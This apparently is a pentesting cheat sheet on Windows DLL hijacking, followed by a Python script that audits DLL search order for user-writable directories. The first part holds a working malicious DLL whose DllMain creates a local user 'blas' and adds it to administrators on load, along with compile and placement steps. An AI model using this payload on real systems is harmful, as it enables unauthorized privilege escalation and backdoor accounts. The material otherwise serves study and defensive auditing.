DLL Hijacking


.\winPEASany.exe quiet filesinfo # services with missing or hijackable DLLs (look for "NAME NOT FOUND" errors in the output)
.\Listdlls64.exe /accepteula ServiceName # lists the DLLs loaded by a process; https://learn.microsoft.com/en-us/sysinternals/downloads/listdlls
icacls "C:\path\to\dll\folder" # check who can write to the folder the DLL is loaded from

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
    HINSTANCE hModule,          // Handle to DLL module
    DWORD ul_reason_for_call,   // Reason for calling function
    LPVOID lpReserved )         // Reserved
{
    int i;
    switch ( ul_reason_for_call )
    {
    case DLL_PROCESS_ATTACH:    // A process is loading the DLL: payload runs here
        i = system ("net user blas blas123! /add");
        i = system ("net localgroup administrators blas /add");
        (void)i;
        break;
    case DLL_THREAD_ATTACH:     // A process is creating a new thread.
        break;
    case DLL_THREAD_DETACH:     // A thread exits normally.
        break;
    case DLL_PROCESS_DETACH:    // A process unloads the DLL.
        break;
    }
    return TRUE;
}

x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll

Hijack the DLL search order: drop the DLL into a folder you have write access to that is searched before the folder holding the legitimate copy (or, if the DLL is missing entirely, into any writable folder in the order).

  1. The directory from which the application loaded.

  2. The system directory.

  3. The 16-bit system directory.

  4. The Windows directory.

  5. The current directory.

  6. The directories that are listed in the PATH environment variable.
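To make the search order above concrete from an audit point of view, here is an added example (not part of the original page) that models the six search locations and, for a given DLL name, reports which directory would win and whether any user-writable directory is consulted before it. The paths, DLL names and ACL results are constructed placeholders, and `writable_by_users` stands in for the result an icacls check would give.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass
class Directory:
    path: str
    dlls: Set[str]            # DLL file names present in the directory
    writable_by_users: bool   # outcome of an ACL check (e.g. icacls); constructed here


def build_search_order(app_dir: Directory, system_dir: Directory, system16_dir: Directory,
                       windows_dir: Directory, current_dir: Directory,
                       path_dirs: List[Directory]) -> List[Directory]:
    """Order directories the way the loader consults them (SafeDllSearchMode on, the default):
    application dir, System32, 16-bit system dir, Windows dir, current dir, then each PATH entry."""
    return [app_dir, system_dir, system16_dir, windows_dir, current_dir, *path_dirs]


def resolve(dll_name: str, order: List[Directory]) -> Optional[Directory]:
    """First directory in search order that actually contains dll_name.
    None models the 'NAME NOT FOUND' result seen in Process Monitor / winPEAS output."""
    wanted = dll_name.lower()
    for d in order:
        if wanted in {n.lower() for n in d.dlls}:
            return d
    return None


def audit(dll_name: str, order: List[Directory]) -> Dict:
    """Report which directory would win and which user-writable directories are consulted
    before it. Any such directory is a hijack opportunity to fix (tighten ACLs, or have the
    program load the DLL by fully qualified path)."""
    winner = resolve(dll_name, order)
    writable_before = []
    for d in order:
        if winner is not None and d.path == winner.path:
            break
        if d.writable_by_users:
            writable_before.append(d.path)
    return {
        "dll": dll_name,
        "loaded_from": winner.path if winner else None,
        "writable_dirs_searched_first": writable_before,
        "hijackable": bool(writable_before),
    }


def sample_audit() -> Dict[str, Dict]:
    """Constructed scenario: every path, DLL name and ACL result here is made up."""
    app = Directory(r"C:\Program Files\VulnSvc", {"helper.dll"}, False)
    system32 = Directory(r"C:\Windows\System32", {"kernel32.dll", "user32.dll"}, False)
    system16 = Directory(r"C:\Windows\System", set(), False)
    windows = Directory(r"C:\Windows", set(), False)
    cwd = Directory(r"C:\Users\alice", set(), True)       # service started with a user-controlled cwd
    tools = Directory(r"C:\Tools", {"plugin.dll"}, True)   # PATH entry with loose ACLs
    order = build_search_order(app, system32, system16, windows, cwd, [tools])
    return {name: audit(name, order)
            for name in ("helper.dll", "kernel32.dll", "plugin.dll", "missing.dll")}


if __name__ == "__main__":
    for name, result in sample_audit().items():
        flag = "HIJACKABLE" if result["hijackable"] else "ok"
        loaded = result["loaded_from"] or "NAME NOT FOUND"
        print(f"{name:14} -> {loaded:28} {flag} {result['writable_dirs_searched_first']}")
```

In the constructed scenario, `helper.dll` and `kernel32.dll` resolve before any writable directory is reached, while `plugin.dll` (found only in a PATH entry) and `missing.dll` (never found) are both reachable from a user-writable directory first. Two caveats when applying this to a real host: DLLs listed under the KnownDLLs registry key are not searched for on disk at all, and the order above assumes SafeDllSearchMode is enabled; with it disabled the current directory moves up to second place.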
